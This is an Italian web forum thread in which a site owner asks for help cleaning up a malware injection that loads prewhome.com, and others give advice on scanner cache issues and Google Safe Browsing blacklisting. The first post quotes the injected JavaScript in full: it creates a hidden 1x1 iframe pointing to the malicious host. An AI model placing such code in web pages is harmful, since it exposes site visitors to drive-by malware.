Visualizzazione risultati 1 fino 9 di 9

Discussione: Attacco malware prewhome.com

  1. #1
    TrainWeb non è connesso Utente
    Data registrazione
    16-10-2002
    Messaggi
    212

    Predefinito Attacco malware prewhome.com

    Buongiorno a tutti.
    Sto combattendo da ieri nella pulizia dei file del codice maligno. Ho già rimosso il codice da un centinaio e più di file.
    Codice:
    <!--fff309--><script type="text/javascript" language="javascript" > (function () { var cjd = document.createElement('iframe'); cjd.src = 'http://prewhome.com/'; cjd.style.position = 'absolute'; cjd.style.border = '0'; cjd.style.height = '1px'; cjd.style.width = '1px'; cjd.style.left = '1px'; cjd.style.top = '1px'; if (!document.getElementById('cjd')) { document.write('<div id=\'cjd\'></div>'); document.getElementById('cjd').appendChild(cjd); }})();</script><!--/fff309-->
    Ma nonostante ciò la scansione attraverso sucuri, indica ancora la presenza del malware, in alcuni file che, ricontrollandoli sono privi del codice indicato sopra, come è possibile che la scansione da ancora esito positivo? Come posso rimediare?
    E' possibile che l'indicazione dei file infetti sia errata, cioè che si riferiscono ad altri files?
    TrainWeb

  2. #2
    L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,306

    Predefinito

    Ti sei assicurato che il tuo pc sia pulito?

  3. #3
    TrainWeb non è connesso Utente
    Data registrazione
    16-10-2002
    Messaggi
    212

    Predefinito

    Si è da ieri che sto facendo passate di antivirus, S&D combofix+ e malwarebyte...
    Il problema è che la scansione di sucuri mi dice che lo script javascript è in quattro file ma io li ho riesaminati anche da un pc pulito e di quello script non c'è traccia.
    TrainWeb

  4. #4
    L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,306

    Predefinito

    Avrà problemi di cache anche lui magari

  5. #5
    TrainWeb non è connesso Utente
    Data registrazione
    16-10-2002
    Messaggi
    212

    Predefinito

    haahah speriamo che sia così, continua a darmi anche la presenza dello scrip nei file
    soul_city / template / styleswitcher.js
    soul_city / template / forum_fn.js
    ma di quel codice malevolo non c'è traccia...
    TrainWeb

  6. #6
    Guest

    Predefinito

    In questo momento Chrome mi segnala il tuo sito come contenente malware.
    Sucuri lo segnala come pulito ma ancora presente nella blacklist di Google Safe Browsing.
    Se quando fai lo scan tu con Sucuri risulta infetto il problema è la tua cache.
    Devi contattare Google Safe Browsing per far rimuovere il sito dalla sua blacklist.

    Ciao

  7. #7
    TrainWeb non è connesso Utente
    Data registrazione
    16-10-2002
    Messaggi
    212

    Predefinito

    Anche a me sucuri lo da come presente in balck list. Stranamente con IE il sito e visibile e funzionale
    TrainWeb

  8. #8
    Guest

    Predefinito

    IE è un caso disperato, non prenderlo come punto di riferimento in queste circostanze.

  9. #9
    TrainWeb non è connesso Utente
    Data registrazione
    16-10-2002
    Messaggi
    212

    Predefinito

    Infatti da tempo non lo uso più, ma nella disperazione ho voluto provarlo.
    Citazione Originalmente inviato da australiafever Visualizza messaggio
    IE è un caso disperato, non prenderlo come punto di riferimento in queste circostanze.
    TrainWeb

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •